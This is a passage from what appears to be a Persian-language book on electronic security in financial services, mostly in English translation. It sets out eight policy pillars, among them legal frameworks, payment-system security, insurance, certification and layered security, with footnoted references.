‫ﺑﺎﺷﻨﺪ‪ .‬ﻣﺰﺍﻳﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ‬
‫ﺟﺪﻳﺪ ‪ -‬ﻣﺜﻞ ﻛﺎﺭﺁﻳﻲ ﻭ ﺻـﺮﻓﻪﺟـﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨـﻪﻫـﺎ ‪ -‬ﻭﺍﺿـﺢ‬
‫ﻫﺴﺘﻨﺪ‪:‬‬
‫‪.۲‬‬
‫ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺠﻢ ﺯﻳﺎﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺳﺮﻋﺖ ﺯﻳﺎﺩ‬
‫ﻭ ﺑﺼﻮﺭﺕ ﺍﺭﺯﺍﻧﻘﻴﻤﺖ ﺗﻘﻮﻳﺖ ﻣﻲﺷﻮﺩ؛‬
‫‪.۳‬‬
‫ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﻭ‬
‫ﻣﺪﻳﺮﻳﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ‬
‫ﺍﻗﻼﻡ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﻣـﺎﻟﻲ‪ ،‬ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮ ﺭﻓﺘـﺎﺭ‬
‫ﻣﺸﺘﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻭ ﻓﺮﻭﺵ‪ ،‬ﻭ ﺍﺭﺍﺋـﻪ ﺁﻣـﺎﺭ‬
‫ﺩﻗﻴﻘﺘﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺍﻳﻦ ﺍﺻـﻼﺣﺎﺕ ﺑـﺪﻭﻥ‬
‫ﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‬
‫ﻭ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻤﺘﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺁﻳﻨـﺪ ﺻـﺪﻕ‬
‫ﻣﻲﻛﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺑﺨـﺶ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﻭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻣـﻮﺭﺩ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﺑﺨـﺶ ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺧﺎﺹ ﺑﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ‪ ،‬ﻣـﺪﻳﺮﺍﻥ‪ ،‬ﻭ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻣـﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻭ‬
‫ﺩﻳﮕﺮ ﺍﻓﺮﺍﺩ ﺫﻳﻨﻔﻊ ﺩﺭ ﺷﺮﻛﺖ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ‪ ١٣‬ﻭ ﻳﺎﺩﺩﺍﺷــﺘﻬﺎﻱ ﺭﻭﺍﻝﻣﻨــﺪ‪ ١٤‬ﺑﺮﺍﺣﺘــﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺩﻭﻟﺘـﻲ ﻳـﺎ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻪ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺷﻮﻧﺪ ﻭ ﭼﻪ ﺧـﺎﺭﺝ ﺍﺯ‬
…it, the development and support of security infrastructure, policies, and procedures will still be, for most companies, nothing more than striking a balance among rules. Executives, managers, and policymakers must take risks seriously and, by defining the organization's formal objectives and minimum growth, set a benchmark and standard for balancing investment in security. Once the organization has reached a satisfactory level of security, management must not forget the importance of keeping systems up to date and of regular audits of the security plan. Changes to computers and network equipment, for example of the kind specific to open source software packages[17], require a full review of the detailed security plan. In short, security is more an art than a science, and ensuring that it works successfully in organizations requires the collaboration and coordination of a large number of the community's creative thinkers.[18]

1. Business relationships with customers, vendors, and partner companies improve;

In addition to internal procedures and policies, some small and medium-sized organizations may decide to outsource their security needs. In the industrialized world, some experts say that outsourcing non-core services such as IT security will remain a strategy for companies for at least the next ten years. In addition, some organizations have a particular interest in meeting global security needs, especially the security needs of developing countries. For example, the Information Systems Audit and Control Association (ISACA)[15] has business partners in 60 countries and makes the text of various programs from different countries freely available.[16] ISACA also proposes a control and audit framework for organizations and provides checklists for the use of external resources.

[13] Checklist
[14] Procedural Notes
[15] Information System Audit and Control Association (ISACA)
[16] To learn about this association's future programs, visit its website at the following address: http://www.isaca.org. This study has made Uruguay a country of interest for readers of this book to study (1): http://www.isaca.org/ct_case.htm. COBIT (http://www.isaca.org/cobit.htm) provides a platform of suitable electronic security resources for use by managers, users, and information security audit, control, and security specialists. Contacting ISACA gives you a good view of the association's current and future activities.
[17] Open Source Software Packages
[18] Because of the increase in security incidents around the world, a number of consulting firms have prepared reports on information technology and its global effects. For example, see the following source: Ernst & Young's 2003 Global Information Security Survey: http://www.ey.com/global/download.nsf/US/TSRSGlobal_Information_Security_Survey_2003/$file/TSRS_-_Global_Information_Security_Survey_2003.pdf
Chapter Two
A Review of Methods for Mitigating the Effects of Electronic Security Risks[19]

Overview

Security in Electronic Financial Services

Several recent papers have presented electronic security as a vital issue in enabling electronic financial services[20] to meet the expectations of organizations and customers and to deliver the benefits of technology.[21] Electronic security touches the heart of the new economy, because the potential benefits of the international community's global markets are very significant, and these markets cannot be used to best effect unless security is ensured in the electronic environment. In any case, the direction of the global economy calls for an in-depth discussion of modern commerce and policymaking: How should privacy[22] be defined and protected? What do assurance and trust mean in a digital environment? How can an appropriate level of security be determined? And, finally, how should return on investment (ROI)[23] be measured for security investments?

This chapter identifies, defines, and discusses an eight-pillar set of policies and procedures, together with an overall infrastructure, for strengthening a secure electronic environment for the financial services sector. This part has been prepared for policymakers who work with financial service providers, in particular executive offices, chief information officers, and chief security officers. Its technical points are very useful for those who administer electronic security systems, for bank examiners who assess the effectiveness of electronic security, and for those who deal with the inherent, day-to-day risks of electronic transactions.

Because technology is constantly changing, this book not only does not go into the details of all these topics, but for some of them does not even offer general answers. Instead, it gives a quick review of what has happened in the security world to date and of the gaps that are emerging in electronic security, offers some possible ways of narrowing those gaps, and points to some of the activities under way around the world to address these concerns.

What Is Electronic Security?

In general, electronic security is any tool, technique, or process used to protect a system's information assets. Electronic security adds value to a network and is made up of soft and hard infrastructure. Soft infrastructure consists of the policies, processes, protocols, and guidelines that prevent the system and data from being misused. Hard infrastructure consists of the software and hardware needed to protect the system and data against security threats from inside and outside the organization. Note that the level of electronic security for any activity should be proportionate to the value of that activity; security for important transactions and dealings should therefore be provided at a higher level than for ordinary ones.

[19] This chapter was written with the help of a report prepared for the World Bank in 2002 by Thomas Glaessner, Tom Kellerman, and Valerie McNevin: "Electronic Security: Risk Mitigation in Financial Transactions.": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications
[20] E-Finance
[21] For more information, see the work of Glaessner, Kellerman, and McNevin, including the following book: "Electronic Safety and Soundness: Securing Finance in a Digital Age, Public Policy Issues" (October 2003). This treatise is the culmination of efforts made over the past three years that have led to several papers. Other papers in this set include: "Electronic Security: Risk Mitigation in Financial Transactions" (May 2002, June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002), all of which are available at the following address: http://www.worldbank1.org/finance
[22] Privacy
[23] Return on Investment
Because a new technology also brings new risks, and technologies are spreading further every day, electronic security deserves greater attention.

Electronic financial services are the use of electronic means to exchange information, transfer symbols and credit instruments, and conduct transactions in a commercial environment. Electronic financial services consist of four basic components:
• Electronic funds transfers (EFTs)[24];
• Electronic data interchange (EDI)[25];
• Electronic benefits transfers (EBTs)[26]; and
• Electronic trade confirmations (ETCs)[27].

Although electronic financial services create a great opportunity for developing markets to expand trade, they also bring several serious risks. All four components of electronic financial services are susceptible to fraud, theft, embezzlement, and tampering. Most commercial crimes that occur on the Internet are not particularly new - fraud, theft, identity forgery, and extortion have plagued the financial services industry for years - yet technological progress constantly creates new dimensions, and this can widen the depth and scope of crime. Technology allows very extensive and complex crimes to be carried out quickly and anonymously. In the past, stealing 50,000 credit cards would have taken highly organized criminals months or even years; today, a criminal using free tools available on websites can break into an identity database and steal the same number of credit cards in just a few seconds.

According to recent surveys, an estimated 57% of intrusion attacks in the United States last year were initiated in the financial sector. Many breaches, such as one serious case at the U.S. Treasury Department, resulted from mistakes in implementing risk assessment processes and from deploying commercial off-the-shelf software without a layered security approach, that is, without measures such as personnel policies, communications guidelines, and regular updating of the technical tools in use, such as virus scanners[28] and firewalls[29]. The consequences of these security breaches, news of which also reached the media, ranged from loss of reputation and financial standing at one end to a hidden change in customers' behavior toward electronic transactions at the other; and the sole cause of all this was customers' lack of trust in the intermediaries of electronic commerce and electronic financial services.

The networked economy creates diverse opportunities both for generating wealth and for theft and sabotage. In weighing the advantages and disadvantages of this process, policymakers and decision-makers must increase their awareness of the role that electronic security plays in ensuring trustworthy commercial transactions.

The electronic security industry is growing and globalizing; it therefore raises public policy challenges in the areas of competition policy, potential conflicts of interest, and certification.

In the recent past, companies providing electronic security services generally worked in three areas: access, use, and assessment. Beyond these, today's industry includes companies that offer other services in this field as well, such as data monitoring and filtering, intrusion detection, firewalls, penetration testing to examine the vulnerability of software and hardware, encryption software, and authentication services using passwords, tokens, keys, or biometrics, all of which verify the identity of the parties or the integrity of the data.

[24] Electronic Funds Transfers
[25] Electronic Data Interchange
[26] Electronic Benefits Transfers
[27] Electronic Trade Confirmations
[28] Virus Scanners
[29] Firewalls
In addition to electronic security, many vendors also provide a considerable share of the communications between electronic financial service providers in different countries. These companies include hosting companies[30], ISPs, and financial service providers. In new markets, telecommunications companies usually act as key providers of short-wave, satellite, and mobile telephone services. These companies may also provide hosting services, money transfer services, and in some cases electronic security infrastructure services.

Ownership in the electronic security and electronic finance industries raises complex questions about competition policy and potential conflicts of interest. On competition policy, one may ask: can the multiple roles of telecommunications companies lead to the suppression of competition, particularly in emerging markets, where they are usually the ones that have the technical specialists to provide these services? Or, how are the integrity of the services provided and the company's policies on accurate and prompt reporting of security breaches to be guaranteed? In addition, the trend toward outsourcing to third-party companies highlights the importance of reforming the allocation of responsibilities, starting from the top of the chain of responsibility, in an industry with such a complex set of vendors. Contracts between financial institutions and their service providers usually use part of the service contract fee as a performance guarantee; even so, the performance of the work done has not been adequately addressed from a security standpoint.

In regulating electronic security in the financial services industry, the public interest must be taken into account. In electronic security, a reasonable balance must be struck between privacy and matters such as cost, quality of service, and innovation, and particular attention must also be paid to this balance when drafting rules and policies.

The telecommunications industry was traditionally regarded as essential to public welfare, comfort, and health, and so a main component of its regulation was the expansion of services for public access. Today, however, in many countries access to basic electronic services is also considered a necessity of life. Historically, the financial services industry has been regulated on the rationale that trust and confidence are of the utmost importance in the orderly transfer of goods and money; and since financial institutions depend on public trust, they must conduct their business in a sound, rational, and prudent manner. As the telecommunications industry and the financial services sector converge through the Internet, the importance and necessity of informed public policy and regulation grows day by day, to ensure that government, businesses, and the public can continue to use safe financial services.

In preparing public policies to establish or reform electronic security criteria, eight important pillars must be taken into account:
• A suitable legal and enforcement framework;
• Technical and managerial arrangements for ensuring the electronic security of payment systems;
• Strong supervision and prevention, to create better incentives for implementing appropriate, layered risk management systems, including electronic security, for financial service providers;
• A framework in which private insurance companies can insure against electronic risks and, alongside that, raise standards in this field by creating financial reimbursement obligations;
• Digital signatures;
• Information sharing;
• Educating citizens, employees, and management about security issues; and
• A layered security structure.

[30] Hosting Companies
Pillar One:
Legal and Enforcement Framework

Countries in which electronic banking or other electronic financial services (such as the distribution and trading of securities) are conducted must, as they develop laws, policies, and practices, also address their own electronic security issues. They must provide security to protect electronic operations and amend their criminal laws to cover crimes of this kind.

In the process of drafting policy and a legal framework for electronic financial services, the following topics must be considered:
• Electronic transactions and electronic commerce;
• Payment systems security;
• Privacy;
• Cyber crime;
• Anti-money laundering; and
• Enforcement infrastructure.

Together, these six areas of policy, law, and enforcement must address first the basic relationships among all stakeholders and then the transactions that flow through payment systems. One of the most important components of a suitable legal framework for electronic financial services is recognition of the legal validity of electronic signatures, transactions, and customer records. The legal framework should give preference to technical solutions, provide protection for customers in conducting electronic transactions, and promote interoperability.

Electronic Transactions

An electronic transactions law should state what is meant by an electronic signature, record, or transaction, and in doing so establish the legal validity of each element. These policies must be very precise, particularly in defining an electronic signature. As far as possible, definitions should have technical characteristics so that different solutions can enter the market.

Payment Systems Security

In drafting policy for payment systems security, all the components that directly affect the system must be considered. All of these components must operate securely in order to protect the integrity and reliability of the systems. Moreover, having a policy in this area makes it possible to produce accurate and valuable reports on all electronic financial losses, attacks, and damage. The mere existence of a security policy means that the financial institution and its managers have probably taken the necessary measures against risks.

Privacy

A privacy law should cover the protection and use of data, consumer protection, and other related business requirements, and should declare the organization's policies on the use of information. The European Union continues to lead in protecting the privacy of its citizens under the Data Protection Directive (adopted in 1995). At a minimum, a privacy law should include the principles of fair information use (including notice, choice, access, and the minimum information needed to complete a transaction).

Cyber Crime[31]

Every country should have laws on the misuse of networks and computers that causes serious damage to the networks and computers themselves and many other harms. The law should also specify the tools and resources needed to investigate and prosecute cyber crime, as well as the punishment of its perpetrators. An example of such laws and guidelines can be found in Europe's Convention on Cyber Crime[32], which is discussed in detail in Chapter Four.[33]

Anti-Money Laundering

Policies should define methods for combating money laundering and encourage the international community to cooperate in investigating, prosecuting, and punishing such crimes, in order to reduce the threat posed by money laundering, which has also spread to new technologies.

[31] Cyber Crime
[32] Europe's Convention on Cyber Crime
[33] Council of Europe Convention on Cyber Crime: http://conventions.coe.int
Law Enforcement

It may be said that the need to enforce electronic security laws within a country's borders is as important as having the legal framework itself. Many kinds of computer attacks have originated in countries with weak legal and enforcement regimes for electronic security, which makes the need for mechanisms for international cooperation more evident than ever.

Pillar Two:
Electronic Security in Payment Systems

Legislators must consider how to extend supervision and law enforcement to electronic transfer mechanisms. The first reason most people give for not using electronic transfer mechanisms is fear that their information is not adequately protected. Proper protection can increase consumer confidence and strengthen market discipline, and thereby pave the way for greater use of electronic financial systems.

Legislative Pioneers

Payment systems are an important part of any financial system. Policies drafted to reduce payment system risks must in some way provide a solution for the following five items:
1. Definition of money transmitters;
2. Reporting requirements;
3. Regulations;
4. Warranties, indemnification, and liabilities; and
5. Security requirements for service providers.

Definition of Money Transmitter

A money transmitter is any business organization engaged in the transfer and exchange of currency and monetary instruments. These organizations are usually engaged in the "money services business" and operate as third-party automated clearinghouses[34].[35] In examining the security of electronic payment systems, legislators should be aware that a new pattern of money movement has emerged in complex information technology environments. The considerable volume of money that flows around banks rather than through them has a significant effect on the global payment system, monetary policy, and economic forecasting.

Reporting Requirements

Failure to report security incidents, particularly in financial services, increases the likelihood that those who use payment systems without the necessary checks and precautions will continue unsafe and unsound practices, and therefore that further losses will occur. One solution would be to place the duty of reporting incidents on executive officers.[36]

Indemnification Warranties

Financial institutions can require after-sales service and indemnification from companies that produce software and hardware. They can also require companies to supply products that are resistant to potential damage arising from hardware and software security flaws. Organizations that provide such services or products to the financial services industry apply stronger protection standards and consider themselves obliged to state when their product has not been configured for, or is not suitable for, use in a particular sector. One solution for all of these cases is to place a disclaimer note[37] on the software or hardware stating that the product must not be used to create, transmit, or store unauthorized, sensitive, or confidential information, and that otherwise its producer bears no liability.

[34] Third-Party Automated Clearinghouse
[35] These services may also include requests to receive and transfer money, capital conversion, and other similar items.
[36] Especially chief information officers and information security managers
[37] Disclaimer Note
Liability

The legal and regulatory framework can create incentives for hosting companies, application service providers, software and hardware vendors, and electronic security providers to be accountable to the financial services industry.

Standards for Service Providers

Providers of services to the financial services industry can apply a stronger standard than providers of services that are not directly connected with the industry. It is stressed once again that, even when this is done, there is still a long way to go before confidence and trust are established.

Pillar Three:
Supervision and Prevention Challenges

Capital Requirements

The new Basel[38] guidelines on capital, particularly those relating to operational threats, do not address the reputational risk or the strategic risks of electronic security vulnerabilities. This raises the question: when information about security incidents is inaccurate and damage to reputation is hard to assess, what is the best way to measure a bank's operational risk? On the question of determining the capital required for electronic security risks, one effective approach may be to use an assessment process to identify and remedy electronic security breaches, combined with greater incentives for reporting such incidents.[39] In addition, authorities can encourage or require financial service providers to insure themselves against certain aspects of electronic risk that are not covered in the existing policy framework (such as denial of service or identity theft). As the private insurance industry has become more active in this field, this approach appears more practical than ever and can contribute to the overall soundness of the insurance industry and its structure in emerging markets.[40]

Supervision and Examination Processes

In addition to overseeing payment systems and supervising money transmitters, revising legal, supervisory, and prevention guidelines may be useful for ensuring the security of financial service providers. This is particularly relevant for businesses engaged in electronic banking or in providing other Internet financial services.

The Electronic Banking Group (EBG) of the Basel Committee on Banking Supervision[41] was formed to make recommendations on enhancing, changing, or reforming supervision and examination as needed to adapt procedures to new technologies. In 2001, the EBG published Risk Management Principles for Electronic Banking, which included specific principles setting out standards for validation and authentication, internal controls, the integrity of asset security, and the integrity of electronic banking information. The fields of supervision and examination will undergo a major change of direction over the next few years. Just as the security industry experienced a paradigm shift with the introduction of, and mass reliance on, personal computers and the Internet, banking supervision too seems set to experience a shift in the financial services industry's center of gravity.

Coordination of Domestic and Cross-Border Agencies

A key issue that most countries face is the need to improve the exchange of information between regulators and law enforcement agencies (police forces). Many countries have several agencies for collecting important information, but usually the information is not shared among these agencies or with cross-border agencies (sometimes for legal reasons). The subject of information exchange between agencies at the national and international level is beyond the scope of this book. In any case, as governments try to combat crime in the electronic environment, information sharing and international cooperation are key issues in this discussion.

[38] Basel
[39] See paragraph 6 of this executive summary.
[40] In many emerging markets, the insurance industry itself may need to be restructured and put on a sound footing; in any case, this situation too can be prevented.
[41] Banking Supervision's Electronic Banking Group
Pillar Four:
The Role of Private Insurance as a Complementary Monitoring System

Agencies that supervise financial services are still developing regulatory standards. Because of the inherent difficulties of supervising complex transactions based on changing technical infrastructure, finding complementary solutions for managing risk is very important. Despite shortcomings in the information needed to estimate losses from electronic risks, the insurance industry has been playing a role in this area for some time. It is forecast that within the next few years, in the United States market alone, the growth of liability insurance in electronic commerce and its range of risks will reach 2.5 billion dollars annually.

Although liability insurance for electronic commerce and electronic risks is still in the early stages of development, it involves problems relating to first parties and third parties. Estimating the cost of cyber risks needs further development, but to do so the insurance industry needs more information about security breaches and the risks associated with them. For example, the experience recorded so far with this kind of insurance has not paid enough attention to the new risks that wireless technologies have created for financial services. Insurance providers can require that electronic security standards for wireless technology be identified and applied, so that this category of risks has been reduced before they are forced to comply with electronic risk policies.

The global insurance industry can act as an important force for changing electronic security requirements. First, it can bring about improvement in the minimum standards of electronic security in the financial services industry. For example, the global financial services industry can prompt companies to use layered electronic security as a precondition for doing business. Second, insurance companies can ask financial service institutions to turn to vendors that use approved, industry-accepted standards in providing electronic security services, so as to reduce potential risks. Third, insurance companies can encourage legislators to require financial service institutions to improve the quality of information and reports about incidents, so that they can be used to make a better analysis of electronic risks and return on investment. Finally, the insurance industry can publish solutions in which matters such as risk sharing and accountability for security breaches between electronic security vendors and other companies active in this field (such as hosting companies) are made mandatory.

Pillar Five:
Certification[42], Standards, and the Role of the Public and Private Sectors

The public and private sectors must work together to develop standards and to harmonize approval and certification schemes. The two topics addressed here are certification of electronic security service providers and certification of the elements of each transaction.

One possible approach to securing electronic finance is for legislators to require vendors that directly affect the payment system to obtain a license. Another approach is to require the industry to approve and certify electronic security service providers. For example, a certificate entitled "security specialist" has recently been established in the security industry. In effect, by providing the consumer with a recognizable structure, accountability between the industry and its specialists, and a separation of approved specialists from those who consider themselves specialists, it is the whole industry that benefits. This approach also raises the status of the security field to that of a professional field and gives the industry the incentive to develop and apply standards.

[42] Certification
The next area to consider is certification of the elements of a transaction, such as the electronic signature. Certification can increase the value of a transaction depending on who and what has certified it. A certificate may be issued by a government body such as the post office or by a private organization such as a bank. Each of these has its own structural and management issues. In many countries, private companies may do a better job of providing the information infrastructure needed for certification.

A core element of a successful certification program is that the structures that exist in different jurisdictions must use the same characteristics to validate all transactions, and the scope of a certifier's authority and responsibilities must be uniform and comprehensive across all jurisdictions.

Although the use of public key infrastructure (PKI)[43] technology and certification are usually regarded as the only acceptable ways of providing security, attention must also be paid to the costs and the complex, tangled structures of PKI and to its legal incompatibilities with certification authorities (CAs)[44]. For a solution to be reasonable and appropriate, it must be workable with regard to boundaries such as trust and accountability, and it matters little which technology is used to achieve this.

Pillar Six:
Accuracy of Information on Security Incidents, and Cooperation Between Government and the Private Sector

The lack of accurate information about electronic security incidents is the result of little knowledge or incentive to collect, measure, and share information. As domestic and cross-border arrangements expand to make it easier for financial service providers to share accurate information about denial-of-service attacks, theft, fraud, and so on, electronic security will be strengthened around the world. Failing to share information not only keeps knowledge at a fixed level but, more importantly, can also limit the development of private sector solutions (including insurance). This lack of information may increase the cost of insurance for companies and financial service providers.

Broader cooperation between government and the private sector is needed in this area. For example, BIST's Security and Risk Assessment Steering Committee[45], by establishing a financial services security laboratory, examines topics such as security, the safety and soundness of payments, electronic commerce, and related technologies. The laboratory also facilitates the exchange of information on security issues in the financial services industry. In addition, the existence of the Internet Security Alliance[46], the Forum of Incident and Response Security Teams[47], and the Computer Emergency Response Team (CERT)[48] in various countries shows that mutual cooperation leads to increasing information sharing between law enforcement and private companies that provide financial services. A common element in all these programs is the observance of confidentiality and trust: law enforcement and educational institutions do not disclose the identity of the sources of their accurate information. The role of multilateral organizations in facilitating cooperation in this area needs to be examined. Clearly, the more integrated the economy becomes, the more important it is that each sector carries out its responsibilities properly; and this is while today's financial services industry started out as a centralized system, and it is the technological changes of the past decade that have extended and increased the system's interdependencies.

[43] Public Key Infrastructure
[44] Certification Authorities
[45] BIST's Security and Risk Assessment Steering Committee
[46] Internet Security Alliance
[47] Forum of Incident and Response Security Teams
[48] Computer Emergency Response Team
Pillar Seven:
Education and Prevention of Electronic Security Incidents

Statistical analysis shows that in many countries more than 50% of electronic security attacks on organizations are carried out by people inside the organizations. A poorly educated workforce is more vulnerable to Internet attacks. Conversely, a trained workforce that is aware of security issues can add an effective layer of protection to the system.

Initial educational measures should be considered for financial service providers, both managers and system administrators (who are engaged in supervision and law enforcement in various agencies), and also for Internet users of financial services. The initial measures include the following:
• Raising awareness and educating people in the financial sector about ethical principles on the Internet and appropriate user behavior in networked systems;
• Drafting organization-wide electronic security policies on matters such as proper conduct and the channels available for reporting attacks or incidents, in full coordination with all activities aimed at completing worldwide information on attacks;
• Increasing the awareness of the emerging-market banking community about the need for incident response plans[49] when an incident occurs;
• Facilitating cooperation and knowledge transfer among law enforcement, financial intelligence units[50], and supervisory agencies in developed and emerging markets, with tools such as schemes for active information exchange among staff;
• Designing intensive courses for examiners with the help of the Financial Stability Institute[51] or other training centers;
• Developing a multipurpose university program to train the electronic security specialists of the future while at the same time raising the knowledge level of users of Internet financial services.

Pillar Eight:
Layered Security

There are twelve core layers of security that are fundamental components of a sound plan for maintaining data integrity and reducing risk in open-architecture environments. This twelve-layer chain explains which security mechanism should be used in each situation, and also says that the security of any network is only as strong as the weakest element of that network. Details of this twelve-layer security plan are given at the end of this part.

[49] Incident Response Plan
[50] Financial Intelligence Units
[51] Financial Stability Institute
[52] The Internet grew out of ARPANET, which in 1969, by the Advanced Research Projects Agency (Advanced

Caveats

Parts Three and Four of the book concern environments that are rapidly taking shape and that try, through a disciplined approach, to bring economics, law, and technology into balance with one another. Because of rapid global growth, electronic security has an enigmatic form. Most countries, including those with more experience of security issues, still have little knowledge in this area, and emerging markets know even less. This book pays more attention to the lessons of the United States, because it is where the Internet originated, has had more time to experience its advantages and disadvantages, and also created the early standards in this field.[52] In preparing this book, the activities and experience of economically advanced countries in Europe, Asia, and South America have also been taken into account. Obviously, much material on topics such as "the special problems of emerging markets in this field" and "the legal foundations and organizational agreements needed to improve electronic security around the world"
‫ﻃﺮﺡ ﻛﺮﺩ‪.‬‬
‫ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴـﻬﺎ‪ ،‬ﻧﻴﺮﻭﻱ ﺑﺎﻟﻘﻮﺓ ﻋﻈﻴﻢ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻄﺒﻴﻖ ﺩﺍﺩﻩﺍﻧﺪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺧﻄـﺮ‬
‫ﻣﻲﺍﻓﺘﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨـﺎﻥ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺑـﺎﺯﺍﺭ ﻫـﺴﺘﻨﺪ‬
‫ﻱ ﺍﻳـﻦ‬
‫ﺑﻄﻮﺭ ﺟﺪﻱ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﹺ‬
‫ﺑﺨﺶ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺩﻧﺒﺎﻝ ﺷﺪﻩﺍﻧﺪ‪:‬‬
‫ﺍﻟﻒ( ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ؛‬
‫ﺏ( ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛‬
‫ﺝ(‬
‫ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﻭ ﻭﻳﮋﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭﺑﺎﺭﺓ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﻭ‬
‫ﺩ(‬
